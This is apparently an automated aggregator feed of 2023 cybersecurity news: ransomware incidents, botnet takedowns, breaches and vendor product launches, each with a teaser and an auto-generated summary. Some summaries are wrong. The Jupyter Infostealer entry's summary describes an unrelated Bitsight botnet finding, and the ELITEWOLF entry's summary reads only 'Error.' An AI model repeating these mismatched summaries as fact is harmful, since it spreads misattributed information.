      Cyber risk is business risk: Qualys Enterprise TruRisk Platform sets new industry standard

      industry
      2023-11-13 https://www.helpnetsecurity.com/2023/11/13/sumedh-thakar-qualys-trurisk-platform/

      In this Help Net Security interview, Sumedh Thakar, President and CEO of Qualys, explores the vision behind the Qualys Enterprise TruRisk Platform, a strategic move aimed at redefining how enterprises measure, communicate, and eliminate cyber risk. We delve into how Qualys assists CISOs in the complex balancing act of managing critical issues under budget constraints, the financial implications of cyber risk, and the advanced capabilities of the TruRisk Platform in providing a unified view of …

      Autosummary: However, as cyber risk has become a dominant contributor to any organization’s overall risk posture, de-risking a business from cyber risk has become a central focus of executive stakeholders, from the CEO to the board of directors. Today, nearly every business is a software business, relying on software to run core operations, which makes them susceptible to elevated cyber risk and breaches.


      Impinj R720 reader optimizes speed and automation in supply chain and logistics

      industry
      2023-11-13 https://www.helpnetsecurity.com/2023/11/13/impinj-r720-rain-rfid-reader/

      Impinj announced the Impinj R720 RAIN RFID reader. With more processing power and memory than Impinj’s prior-generation reader, the Impinj R720 speeds edge processing and reduces network load and latency, allowing on-reader applications to meet the most demanding requirements of large-scale enterprise deployments. “Enterprises see increasing demand for reliable, real-time data about every item they manufacture, transport and sell,” said Jeff Dossett, Impinj CRO. “The Impinj R720 reader delivers powerful edge processing to support application …

      Autosummary: The Impinj R720 reader further advances the proven Impinj platform, an end-to-end RAIN RFID platform with tag chips, reader chips, readers, software, testing solutions, services, and a global partner ecosystem.


      Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack

      financial exploits ransomware industry
      2023-11-10 https://securityaffairs.com/153986/hacking/icbc-ransomware-attack.html

      The Industrial and Commercial Bank of China (ICBC) suffered a ransomware attack that disrupted trades in the US Treasury market. The Industrial and Commercial Bank of China (ICBC) announced it has contained a ransomware attack that disrupted the U.S. Treasury market and impacted some fixed income and equities transactions. “The Securities Industry and Financial Markets […]

      Autosummary: “The Securities Industry and Financial Markets Association first told members on Wednesday that ICBC Financial Services had been hit by ransomware software, which paralyses computer systems unless a payment is made, several people familiar with the discussions said,” reported the Financial Times.


      Industrial and Commercial Bank of China hit by ransomware attack

      financial exploits ransomware industry
      2023-11-09 https://www.bleepingcomputer.com/news/security/industrial-and-commercial-bank-of-china-hit-by-ransomware-attack/
      The Industrial & Commercial Bank of China (ICBC) is restoring systems and services following a ransomware attack that disrupted the U.S. Treasury market, causing equities clearing issues. [...]

      Autosummary: ICBC is China's largest bank and the largest commercial bank in the world by revenue, with revenue of $214.7 billion and profits of $53.5 billion reported in 2022, according to Fortune.


      Phosphorus and Check Point integrate to provide xIoT visibility and protection

      industry
      2023-11-08 https://www.helpnetsecurity.com/2023/11/08/phosphorus-check-point/

Phosphorus has integrated with Check Point to provide the asset-centric xIoT visibility at the network level. Phosphorus’s Intelligent Active Discovery (IAD) engine and device posture assessment capabilities are able to enrich network-centric technologies with previously unseen levels of high-resolution xIoT device detail, granular risk assessment context, and deep device metadata. This enables organizations to centralize visibility for all of their xIoT assets and facilitate decision-making in the Check Point security infrastructure. Phosphorus uses native device … More

      The post Phosphorus and Check Point integrate to provide xIoT visibility and protection appeared first on Help Net Security.

      "

Autosummary: Key integration benefits for customers include: xIoT visibility: Powered by Phosphorus’s IAD engine, the new integration utilizes the industry’s most advanced xIoT discovery capability which is 98% faster than traditional passive scanners, 95% more efficient (lighter) and provides 100% device certainty the first time. Advanced risk posture view: Phosphorus’s evidence-based risk assessment capability collects over 3X more data points from xIoT assets than other services – including deep detail on devices running with default passwords, insecure configurations, vulnerable or outdated firmware, and more. "


      New Jupyter Infostealer Version Emerges with Sophisticated Stealth Tactics

      industry
      2023-11-06 https://thehackernews.com/2023/11/new-jupyter-infostealer-version-emerges.html
      An updated version of an information stealer malware known as Jupyter has resurfaced with "simple yet impactful changes" that aim to stealthily establish a persistent foothold on compromised systems. "The team has discovered new waves of Jupyter Infostealer attacks which leverage PowerShell command modifications and signatures of private keys in attempts to pass off the malware as a legitimately "

      Autosummary: Cybersecurity firm Bitsight, which revealed details of the service last week, said it identified at least 53 servers related to the botnet that are distributed across France, Bulgaria, Netherlands, and Sweden. "


      Mysterious Kill Switch Disrupts Mozi IoT Botnet Operations

      industry
      2023-11-02 https://thehackernews.com/2023/11/mysterious-kill-switch-disrupts-mozi.html
      The unexpected drop in malicious activity connected with the Mozi botnet in August 2023 was due to a kill switch that was distributed to the bots. "First, the drop manifested in India on August 8," ESET said in an analysis published this week. "A week later, on August 16, the same thing happened in China. While the mysterious control payload – aka kill switch – stripped Mozi bots of most "

      Autosummary: "


      Who killed Mozi? Finally putting the IoT zombie botnet in its grave

      industry
      2023-11-01 https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/
      How ESET Research found a kill switch that had been used to take down one of the most prolific botnets out there "

Autosummary: The kill switch demonstrated several functionalities, including: killing the parent process, i.e., the original Mozi malware, disabling some system services such as sshd and dropbear, replacing the original Mozi file with itself, executing some router/device configuration commands, disabling access to various ports (iptables -j DROP), and establishing the same foothold as the replaced original Mozi file. We identified two versions of the control payload, with the latest one functioning as an envelope containing the first one with minor modifications, such as adding a function to ping a remote server, probably meant for statistical purposes. "


      Vulnerability management metrics: How to measure success

      exploits industry
      2023-10-31 https://www.helpnetsecurity.com/2023/10/31/vulnerability-management-metrics/

      Without the right metrics, vulnerability management is pretty pointless. If you’re not measuring, how do you know it’s working? So how do you know what to focus on? The list is potentially endless, and it can be hard to know what’s really important. In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that: Prove your security posture Meet … More

      The post Vulnerability management metrics: How to measure success appeared first on Help Net Security.

      "

Autosummary: In this article, we’ll help you identify the key metrics that you need to track the state of your vulnerability management program and create audit-ready reports that: prove your security posture; meet vulnerability remediation SLAs and benchmarks; help pass audits and compliance; demonstrate ROI on security tools; simplify risk analysis; prioritize resource allocation. Why vulnerability management needs metrics: Measuring how quickly you find, prioritize and fix flaws allows you to continuously monitor and optimize your security. How long it takes to fix issues is down to you, and this gives you a current snapshot of your ‘cyber hygiene’ – the scan coverage, the time taken to fix issues over a period of six months, and the average time to fix issues overall. Modern scanners like Intruder provide automated, audit-ready reports, but it’s important to know where all your digital assets are to avoid blind spots, unpatched systems and inaccurate reporting – which is why asset discovery is integral to successful vulnerability management. "


      Dragos and Rockwell Automation strengthen ICS/OT cybersecurity threat detection for organizations

      industry ciber
      2023-10-31 https://www.helpnetsecurity.com/2023/10/31/dragos-rockwell-automation-partnership/

      Dragos announced the expansion of its combined capabilities in partnership with Rockwell Automation. With this expansion, Rockwell will be making the Dragos Platform available to organizations for enhanced ICS/OT cybersecurity threat detection, providing global deployment services and support capabilities to help customers operationalize their security investment. The threat detection capabilities build on the previous global agreement between Dragos and Rockwell for the OT Incident Response Retainer (IRR) program that helps industrial organizations prepare for, respond … More

      The post Dragos and Rockwell Automation strengthen ICS/OT cybersecurity threat detection for organizations appeared first on Help Net Security.

      "

      Autosummary: "


      IoT’s convenience comes with cybersecurity challenges

      industry ciber
      2023-10-30 https://www.helpnetsecurity.com/2023/10/30/iot-cybersecurity-concerns-video/

      The rapid proliferation of Internet of Things (IoT) devices has ushered in a new era of connectivity and convenience, transforming the way we live and work. However, this interconnectivity has also given rise to a host of cybersecurity challenges and vulnerabilities. Protecting the vast and diverse array of IoT devices, from smart home appliances to industrial sensors, has become an imperative in safeguarding data, privacy, and critical infrastructure. In this Help Net Security round-up, we … More

      The post IoT’s convenience comes with cybersecurity challenges appeared first on Help Net Security.

      "

      Autosummary: "


      IoT security threats highlight the need for zero trust principles

      industry
      2023-10-27 https://www.helpnetsecurity.com/2023/10/27/iot-malware-attacks/

      The high number of attacks on IoT devices represents a 400% increase in malware compared to the previous year, according to Zscaler. The increasing frequency of malware attacks targeting IoT devices is a significant concern for OT security, as the mobility of malware can facilitate movement across different networks, potentially endangering critical OT infrastructure. ThreatLabz focused on understanding IoT device activity and attributes via device fingerprinting and analyzing the IoT malware threat landscape. As more … More

      The post IoT security threats highlight the need for zero trust principles appeared first on Help Net Security.

      "

Autosummary: IoT malware threatens industrial manufacturing OT processes: Manufacturing and retail accounted for nearly 52% of IoT device traffic, with 3D printers, geolocation trackers, industrial control devices, automotive multimedia systems, data collection terminals, and payment terminals sending the majority of signals over digital networks. "


      What is operational risk and why should you care? Assessing SEC rule readiness for OT and IoT

      industry
      2023-10-25 https://www.helpnetsecurity.com/2023/10/25/operational-risk/

      The newly released Security and Exchange Commission (SEC) cyber incident disclosure rules have been met with mixed reviews. Of particular concern is whether public companies who own and operate industrial control systems and connected IoT infrastructure are prepared to fully define operational risk, and therefore are equipped to fully disclose material business risk from cyber incidents. This concern also provides a fresh opportunity for preparedness. The rules require registrants to disclose material cybersecurity incidents (via … More

      The post What is operational risk and why should you care? Assessing SEC rule readiness for OT and IoT appeared first on Help Net Security.

      "

Autosummary: Security teams at public companies who have identified and outlined their operational risk and critical assets have three key objectives before December 15: to understand operational risk and map it to their company’s definitions of materiality; to evaluate and take stock of OT/IoT assets not covered by existing IT security controls or capabilities; to incorporate both assessments into reporting requirements outlined in the SEC rule for describing how the organization assesses, identifies, and manages material risks. Avoiding vs. mitigating operational risk: The reactive nature of cybersecurity has led to a reality in which boards and executive leaders attempt to mitigate risk by tasking security teams to avoid risk. Once critical assets are identified, they need to be categorized or inventoried, because your team will be incapable of performing root cause analysis on any asset that is not accounted for, monitored, baselined, hardened, or queried. "


      Versa Secure SD-LAN delivers zero trust and IoT security

      industry
      2023-10-24 https://www.helpnetsecurity.com/2023/10/24/versa-secure-sd-lan/

      Versa Networks announced Versa Secure SD-LAN, a software-defined branch and campus Local Area Network (LAN) solution to deliver zero trust and IoT security natively at the LAN Edge. This software-defined approach makes campus and branch networks more agile and integrated, and zero trust improves the security posture. For years, enterprises have grappled with the limitations and vendor lock-in from traditional LAN solutions. Legacy LAN architectures create painful operational challenges and cannot meet the evolving business … More

      The post Versa Secure SD-LAN delivers zero trust and IoT security appeared first on Help Net Security.

      "

Autosummary: Ethernet switches that deliver line rate L2, L3, VXLAN, and L4-7 security including firewall, application identification, adaptive micro-segmentation, IoT fingerprinting, and inline ZTNA. Pre-emptively adjusts traffic paths in real-time, automates troubleshooting, optimizes operations, reduces network downtime, and improves predictability. Converges routing, SD-WAN, SD-LAN, and security into a single branch appliance to deliver simplified management and lower Total Cost of Ownership (TCO). "


      Hackers backdoor Russian state, industrial orgs for data theft

      government industry rusia-ucrania
      2023-10-24 https://www.bleepingcomputer.com/news/security/hackers-backdoor-russian-state-industrial-orgs-for-data-theft/
      Several state and key industrial organizations in Russia were attacked with a custom Go-based backdoor that performs data theft, likely aiding espionage operations. [...] "

      Autosummary: Search disk for files of specific extensions (.doc, .docx, .pdf, .xls, .xlsx, .ppt, .pptx, .zip, .rar, .7z, .odt, .ods, .kdbx, .ovpn, .pem, .crt, .key) and transfer them to the C2. "


      Navigating OT/IT convergence and securing ICS environments

      industry
      2023-10-23 https://www.helpnetsecurity.com/2023/10/23/securing-control-systems-environment-video/

      Escalating threats to operational technology (OT) have prompted an increasing number of global enterprises to adopt sophisticated technologies and services to enhance the security of their assets. In this Help Net Security video, Christopher Warner, Senior GRC-OT Security Consultant at GuidePoint Security, discusses securing the control systems environment, as well as creating a cybersecurity roadmap. OT necessitates a systematic approach. Unique characteristics, such as the importance of safety and the critical nature of system uptime, … More

      The post Navigating OT/IT convergence and securing ICS environments appeared first on Help Net Security.

      "

      Autosummary: "


      US energy firm shares how Akira ransomware hacked its systems

      exploits ransomware industry
      2023-10-23 https://www.bleepingcomputer.com/news/security/us-energy-firm-shares-how-akira-ransomware-hacked-its-systems/
      In a rare display of transparency, US energy services firm BHI Energy details how the Akira ransomware operation breached their networks and stole the data during the attack. [...] "

Autosummary: An investigation concluded on September 1, 2023, indicates that the following data was stolen: full name, date of birth, Social Security Number (SSN), and health information. At the time of writing this, Akira ransomware has not leaked any data belonging to BHI on its extortion portal on the dark web, and neither have the cybercriminals announced BHI in their upcoming data leaks. "


      Jumio 360° Fraud Analytics identifies patterns based on behavioral similarities

      industry
      2023-10-23 https://www.helpnetsecurity.com/2023/10/23/jumio-360-fraud-analytics/

      Jumio unveiled Jumio 360° Fraud Analytics, its new fraud-fighting technology that uses AI-driven predictive analytics to identify fraud patterns with more sophistication and accuracy. According to Jumio’s analysis, 25% of fraud is interconnected — either perpetrated by fraud rings or by individuals using the same information or credentials to open new accounts on banking sites, ecommerce platforms, sharing economy sites and more. A single organized crime operation or fraud ring can cause damage into the … More

      The post Jumio 360° Fraud Analytics identifies patterns based on behavioral similarities appeared first on Help Net Security.

      "

Autosummary: Key features include: Graph database technology and machine learning classify identity transactions into clusters based on behavioral similarities, which is especially powerful for identifying fraud rings. AI-driven predictive analytics determine the likelihood of fraud risk for each identity transaction based on its cluster association. The predictive fraud score can be used to automatically reject identity transactions, stopping fraudsters from accessing your platform in real time. Dashboards provide transparency and help you visualize connected data. Jumio 360° Fraud Analytics is currently available in early release to select customers and will be generally available in early 2024. "


      Does the paper industry need to cut its water usage?

      industry
      2023-10-22 https://www.bbc.co.uk/news/business-67144689?at_medium=RSS&at_campaign=KARANGA
      Firms in the sector are using new technologies to reduce the amount of water they require. "

      Autosummary: "


      Super Mario Bros Wonder game a "notebook of chaos", critics say

      industry
      2023-10-20 https://www.bbc.co.uk/news/entertainment-arts-67167404?at_medium=RSS&at_campaign=KARANGA
      The latest Nintendo adventure follows the gang through the new Flower Kingdom. "

      Autosummary: "


      AuditBoard unveils AI and analytics capabilities to help teams automate critical workflows

      industry
      2023-10-19 https://www.helpnetsecurity.com/2023/10/19/auditboard-analytics/

      AuditBoard revealed powerful new capabilities purpose-built to enable teams to automate critical workflows, surface key strategic insights, and stay on top of proliferating risks. These new platform enhancements further deliver on the promise of AuditBoard’s modern connected risk model, which leverages innovative, purpose-built solutions to help teams surface and manage more risk, work smarter with greater impact, and engage front-line stakeholders: AuditBoard AI: The rapid increase in the volume and velocity of risk and compliance … More

      The post AuditBoard unveils AI and analytics capabilities to help teams automate critical workflows appeared first on Help Net Security.

      "

      Autosummary: AuditBoard AI addresses this challenge by leveraging purpose-built, proprietary algorithms as well as the full spectrum of artificial intelligence technology, including generative AI, machine learning, and natural language processing to bring relevant insights, intelligent suggestions, and powerful automations across audit, risk, and compliance programs. "


      Sophisticated MATA Framework Strikes Eastern European Oil and Gas Companies

      industry
      2023-10-19 https://thehackernews.com/2023/10/sophisticated-mata-framework-strikes.html
      An updated version of a sophisticated backdoor framework called MATA has been used in attacks aimed at over a dozen Eastern European companies in the oil and gas sector and defense industry as part of a cyber espionage operation that took place between August 2022 and May 2023. "The actors behind the attack used spear-phishing mails to target several victims, some were infected with Windows "

      Autosummary: The cross-platform MATA framework was first documented by the Russian cybersecurity company in July 2020, linking it to the prolific North Korean state-sponsored crew in attacks targeting various sectors in Poland, Germany, Turkey, Korea, Japan, and India since April 2018. "


The hot topics from Europe's largest trade fair for IT security

      industry
      2023-10-19 https://www.malwarebytes.com/blog/news/2023/10/the-hot-topics-at-germany-s-it-sa

The major talking points at IT-SA included ransomware, ChatGPT, and NIS2.

The post The hot topics from Europe's largest trade fair for IT security appeared first on Malwarebytes Labs.

      "

      Autosummary: Businesses identified by the member states as operators of essential services in sectors such as energy, transport, water, banking, financial market infrastructures, healthcare, and digital infrastructure, will have to take appropriate security measures and notify relevant national authorities of serious incidents. All in all, I observed a lot of talks, and of the ones I heard that weren’t about promoting a product, most of them roughly fell into 3 categories: Ransomware, AI/ChatGPT, and NIS2. "


      Strengthening the weakest link: top 3 security awareness topics for your employees

      industry
      2023-10-19 https://www.welivesecurity.com/en/business-security/strengthening-weakest-link-top-3-security-awareness-topics-employees/
      Knowledge is a powerful weapon that can empower your employees to become the first line of defense against threats "

Autosummary: Why training matters: According to Verizon, three-quarters (74%) of all global breaches over the past year include the “human element,” which in many cases meant error, negligence or users falling victim to phishing and social engineering. One is threats from public Wi-Fi hotspots that might expose mobile workers to adversary-in-the-middle (AitM) attacks, where hackers access a network and eavesdrop on data travelling between connected devices and the router, and “evil twin” threats where criminals set up a duplicate Wi-Fi hotspot masquerading as a legitimate one in a specific location. Consider the following: 1) BEC and phishing: Business Email Compromise (BEC) fraud, which leverages targeted phishing messages, remains one of the highest-earning cybercrime categories out there. "


      The evolution of deception tactics from traditional to cyber warfare

      industry
      2023-10-18 https://www.helpnetsecurity.com/2023/10/18/admiral-james-a-winnefeld-acalvio-technologies-cyber-warfare/

      Admiral James A. Winnefeld, USN (Ret.), is the former vice chairman of the Joint Chiefs of Staff and is an advisor to Acalvio Technologies. In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. Admiral Winnefeld, given your vast experience in military strategy and operations, … More

      The post The evolution of deception tactics from traditional to cyber warfare appeared first on Help Net Security.

      "

Autosummary: In this Help Net Security interview, he compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. This subtlety, combined with the constant evolution of cyber operations and capability, blurs the boundaries between random attacks, espionage, sabotage, and acts of warfare. Although not all countries or groups or individuals will adhere to international laws, having a clear understanding of the legal dimensions of cyber warfare will help clarify unacceptable parameters of attacks, including, for example, the loss of critical infrastructure systems that could harm large numbers of civilians. "


      ELITEWOLF: NSA’s repository of signatures and analytics to secure OT

      industry
      2023-10-17 https://www.helpnetsecurity.com/2023/10/17/elitewolf-nsa/

      Cyber entities continue to show a persistent interest in targeting critical infrastructure by taking advantage of vulnerable OT assets. To counter this threat, NSA has released a repository for OT Intrusion Detection Signatures and Analytics to the NSA Cyber GitHub. The capability, known as ELITEWOLF, can enable defenders of critical infrastructure, defense industrial base, and national security systems to identify and detect potentially malicious cyber activity in their OT environments. These signatures/analytics aren’t necessarily malicious … More

      The post ELITEWOLF: NSA’s repository of signatures and analytics to secure OT appeared first on Help Net Security.

      "

      Autosummary: Error. "


      Inadequate IoT protection can be a costly mistake

      industry
      2023-10-16 https://www.helpnetsecurity.com/2023/10/16/iot-security-strategy/

      97% of organizations are struggling to secure their IoT and connected products to some degree, according to Keyfactor. The research survey also found that 98% of organizations experienced certificate outages in the last 12 months, costing an average of over $2.25 million. “Organizations worldwide are under mounting pressure to ensure their IoT and connected devices are protected while navigating an increasingly complex digital landscape that requires complete trust,” said Ellen Boehm, SVP, IoT Strategies and … More

      The post Inadequate IoT protection can be a costly mistake appeared first on Help Net Security.

      "

      Autosummary: 88% of organizations agree that improvements are needed in the security of IoT and connected products in use within their organization, with 37% of respondents reporting that significant improvement is needed and 60% reporting that some improvement is needed. "


      Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm

      exploits ransomware industry
      2023-10-16 https://securityaffairs.com/152501/malware/akira-ransomware-attack-blocked.html

      Microsoft thwarted a large-scale hacking campaign carried out by Akira ransomware operators targeting an unknown industrial organization. Microsoft announced that its Microsoft Defender for Endpoint helped to block a large-scale hacking campaign carried out by Akira ransomware operators (tracked by Microsoft as Storm-1567) The attack took place in early June 2023 and aimed at an industrial engineering […]

      The post Microsoft Defender thwarted Akira ransomware attack on an industrial engineering firm appeared first on Security Affairs.

      "

      Autosummary: “This is why, as announced today, we added user containment to the automatic attack disruption capability in Microsoft Defender for Endpoint, a unique and innovative defense mechanism that stops human-operated attacks in their tracks” Follow me on Twitter: @securityaffairs and Facebook and Mastodon Pierluigi Paganini (SecurityAffairs – hacking, ransomware) "


What does TikTok's EGX sponsorship mean for the games industry?

      industry
      2023-10-14 https://www.bbc.co.uk/news/newsbeat-67099348?at_medium=RSS&at_campaign=KARANGA
The app's hoping to take on Twitch and YouTube to become the main stop for online video games content. "

      Autosummary: "


      23andMe hit with lawsuits after hacker leaks stolen genetics data

      industry
      2023-10-13 https://www.bleepingcomputer.com/news/security/23andme-hit-with-lawsuits-after-hacker-leaks-stolen-genetics-data/
      Genetic testing provider 23andMe faces multiple class action lawsuits in the U.S. following a large-scale data breach that is believed to have impacted millions of its customers. [...] "

Autosummary: - Santana v. 23andMe, Inc. complaint. The plaintiffs ask for various financial reliefs against 23andMe, including restitution, lifetime credit monitoring, actual, compensatory, and statutory damages and penalties, punitive damages, and coverage of attorney's fees. "


      Simpson Manufacturing shuts down IT systems after cyberattack

      industry ciber
      2023-10-11 https://www.bleepingcomputer.com/news/security/simpson-manufacturing-shuts-down-it-systems-after-cyberattack/
      Simpson Manufacturing disclosed via a SEC 8-K filing a cybersecurity incident that has caused disruptions in its operations, which are expected to continue. [...] "

      Autosummary: "On October 10, 2023, Simpson Manufacturing Co., Inc. experienced disruptions in its Information Technology (IT) infrastructure and applications resulting from a cybersecurity incident," reads the statement. "


      Securing the future of Industry 4.0: WALLIX white paper reveals key strategies – get your copy today!

      industry
      2023-10-11 https://grahamcluley.com/feed-sponsor-wallix/
      Graham Cluley Security News is sponsored this week by the folks at WALLIX. Thanks to the great team there for their support! In the rapidly evolving landscape of Industry 4.0, marked by rapid innovation and unparalleled connectivity, safeguarding your critical assets is non-negotiable. As industries like Manufacturing, Utilities, Energy, and Transportation undergo profound digital transformations, … Continue reading "Securing the future of Industry 4.0: WALLIX white paper reveals key strategies – get your copy today!" "

      Autosummary: "


      Warning AI industry could use as much energy as the Netherlands

      industry
      2023-10-10 https://www.bbc.co.uk/news/technology-67053139?at_medium=RSS&at_campaign=KARANGA
      A new study looks at the environmental impact of artificial intelligence if current trends continue. "

      Autosummary: "


High-Severity Flaws in ConnectedIO's 3G/4G Routers Raise Concerns for IoT Security

      industry
      2023-10-09 https://thehackernews.com/2023/10/high-severity-flaws-in-connectedios.html
Multiple high-severity security vulnerabilities have been disclosed in ConnectedIO's ER2000 edge routers and the cloud-based management platform that could be exploited by malicious actors to execute malicious code and access sensitive data. "An attacker could have leveraged these flaws to fully compromise the cloud infrastructure, remotely execute code, and leak all customer and device "

      Autosummary: Flaws have also been unearthed in the communication protocol (i.e., MQTT) used between the devices and the cloud, including the use of hard-coded authentication credentials, that could be used to register a rogue device and access MQTT messages containing device identifiers, Wi-Fi settings, SSIDs, and passwords from routers. "


      Gaza-Linked Cyber Threat Actor Targets Israeli Energy and Defense Sectors

      industry
      2023-10-09 https://thehackernews.com/2023/10/gaza-linked-cyber-threat-actor-targets.html
      A Gaza-based threat actor has been linked to a series of cyber attacks aimed at Israeli private-sector energy, defense, and telecommunications organizations. Microsoft, which revealed details of the activity in its fourth annual Digital Defense Report, is tracking the campaign under the name Storm-1133. "We assess this group works to further the interests of Hamas, a Sunni militant group that is "

      Autosummary: "


      Genetics firm 23andMe says user data stolen in credential stuffing attack

      industry
      2023-10-06 https://www.bleepingcomputer.com/news/security/genetics-firm-23andme-says-user-data-stolen-in-credential-stuffing-attack/
      23andMe has confirmed to BleepingComputer that it is aware of user data from its platform circulating on hacker forums and attributes the leak to a credential-stuffing attack. [...] "

      Autosummary: "


      Eyes everywhere: How to safely navigate the IoT video revolution

      industry
      2023-10-05 https://www.helpnetsecurity.com/2023/10/05/connected-devices-cameras/

      Cameras are coming to a connected device near you. Cheap image sensors from old mobile phones are flooding the market and bringing video to the Internet of Things (IoT). Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. This is a major shift in the functionality of connected devices, which now number more than 15 million globally. At the same … More

      The post Eyes everywhere: How to safely navigate the IoT video revolution appeared first on Help Net Security.

      "

Autosummary: To navigate this evolution, device creators must ensure safety, and users should customize, decentralize, and prioritize trusted brands. Moreover, these connections are encrypted to ensure that data is authenticated, confidential, and uncompromised. Vacuum cleaners, bird feeders, connected cars and even smart ovens now come loaded with cameras that recognize the dish and suggest remaining cooking times. "


      Researchers warn of 100,000 industrial control systems exposed online

      industry
      2023-10-04 https://www.bleepingcomputer.com/news/security/researchers-warn-of-100-000-industrial-control-systems-exposed-online/
      About 100,000 industrial control systems (ICS) were found on the public web, exposed to attackers probing them for vulnerabilities and at risk of unauthorized access. Among them are power grids, traffic light systems, security and water systems. [...] "

      Autosummary: The most exposed countries in terms of how many organizations have at least one exposed ICS in them are: United States, Canada, Italy, United Kingdom, France, Netherlands, Germany, Spain, Poland, Sweden (figure: Global exposure of ICSs, BitSight). "


      National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers

      industry
      2023-10-02 https://securityaffairs.com/151819/data-breach/national-logistics-portal-nlp-data-leak.html

      The National Logistics Portal (NLP), a newly launched platform to manage all port operations in India, left public access to sensitive data, posing the risk of a potential takeover by threat actors. On September 24th, researchers discovered that the NLP platform was exposing sensitive credentials, secrets, and encryption keys via publicly available JS files. In […]

      The post National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers appeared first on Security Affairs.

      "

      Autosummary: National Logistics Portal (NLP) data leak: seaports in India were left vulnerable to takeover by hackers. Pierluigi Paganini, October 02, 2023. The National Logistics Portal (NLP), a newly launched platform to manage all port operations in India, left public access to sensitive data, posing the risk of a potential takeover by threat actors. "


      SeeMetrics releases customizable Cybersecurity Performance Boards

      industry ciber
      2023-09-27 https://www.helpnetsecurity.com/2023/09/27/seemetrics-cybersecurity-performance-boards/

      SeeMetrics launched its latest innovation: Customizable Cybersecurity Performance Boards. This product launch marks a significant milestone as it allows security leaders to communicate their desired narrative to different stakeholders and in the context that matters most to them. This customization comes in two essential dimensions: Security leaders can now instantaneously create their own Cybersecurity Performance Boards, selecting from a library of ready-to-use metrics that align with their specific needs and goals. Secondly, the customization extends … More

      The post SeeMetrics releases customizable Cybersecurity Performance Boards appeared first on Help Net Security.

      "

      Autosummary: Secondly, the customization extends to the metrics level as well, allowing leaders to set thresholds, filter business units, timeframes, asset types, geographic considerations and more in a dynamic way. "


      Threat Report: The High Tech Industry Targeted the Most with 46% of NLX-Tagged Attack Traffic

      industry
      2023-09-26 https://thehackernews.com/2023/09/threat-report-high-tech-industry.html
      How To Use This Report: enhance situational awareness of techniques used by threat actors; identify potential attacks targeting your industry; gain insights to help improve and accelerate your organization's threat response. Summary of Findings: The Network Effect Threat Report offers insights based on unique data from Fastly's Next-Gen WAF from Q2 2023 (April 1, 2023 to June 30, 2023). This report "

      Autosummary: When analyzing corresponding Autonomous Systems (AS) of NLX IP addresses, Akamai Connected Cloud (formerly Linode) accounted for the largest portion of NLX traffic (16%), followed by Amazon (15%), M247 Europe SRL (9%), DigitalOcean (6%) and Scaleway (5%). (Figure 4: NLX Traffic by Industry.) Furthermore, nearly one-third (32%) of attacks analyzed in the NLX data were Traversal; while SQL Injection (SQLI) accounted for 28%, Cross Site Scripting (XSS) at 20%, OS Command Injection (CMDEXE) at 13%, and Log4j JNDI lookups (LOG4J-JNDI) at 7%. Before diving deeper into the attack observations, here are five key takeaways that we found most significant in our research, covering global traffic across multiple industries, including High Tech, Financial Services, Commerce, Education, and Media and entertainment. How To Use This Report: enhance situational awareness of techniques used by threat actors; identify potential attacks targeting your industry; gain insights to help improve and accelerate your organization's threat response. Summary of Findings: The Network Effect Threat Report offers insights based on unique data from Fastly's Next-Gen WAF from Q2 2023 (April 1, 2023 to June 30, 2023). Out-of-Band (OOB) Callbacks: Callback server domains are prevalent throughout NLX data, particularly in Log4j JNDI lookups, OS command injection, and Cross-Site Scripting (XSS) attacks. Observations: During the Reporting Period, more than half (54%) of all attacks observed were tagged with NLX and the majority of IP addresses in NLX data were not focused on a single customer or industry but spread across multiple targets: 69% of IP addresses targeted multiple customers (Figure 2), and 64% targeted multiple industries. "


      APT and financial attacks on industrial organizations in H1 2023

      financial industry
      2023-09-25 https://ics-cert.kaspersky.com/publications/apt-and-financial-attacks-on-industrial-organizations-in-h1-2023/
      An overview of reports of APT and financial attacks on industrial enterprises, as well as related activities of groups that have been observed attacking industrial organizations and critical infrastructure facilities "

      Autosummary: Volt Typhoon/VANGUARD PANDA attacks: Researchers from Microsoft have reported that a Chinese-speaking threat actor, Volt Typhoon, was able to establish persistent access inside critical infrastructure targets in the US, including the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors. In the most recent campaign, the group targeted organizations in the communications, manufacturing, utilities, transportation, construction, maritime, government, information technology, and education sectors. Winnkit, a credential-dumping tool, a screenshotting tool, a process-hollowing tool, an SQL tool, Mimikatz, ForkPlayground, and proxy configuration tools. Infrastructure associated with the threat actor has been identified in more than 50 countries across North America, South America, Europe, Africa, Asia and Australia, targeting government networks, research facilities, and journalists. The tools used, which include commodity information stealers, RATs (such as AveMaria/Warzone RAT, LodaRAT), Python-based RATs and information stealers, and Python- and Meterpreter-based reverse shells, are delivered via phishing emails containing malicious LNK attachments and decoy PDF documents. Earth Longzhi attacks: After several months of inactivity, Earth Longzhi (believed to be a sub-group of APT41) targeted healthcare, manufacturing, technology and government organizations in Taiwan, Thailand, the Philippines and Fiji. Middle East-related activity. Mint Sandstorm/Charming Kitten attacks: The threat actor Mint Sandstorm (aka Charming Kitten group, previously tracked as Phosphorous), which researchers believe is linked to the Iranian government, is conducting cyberattacks against US critical infrastructure, particularly organizations in the energy and transportation sectors.
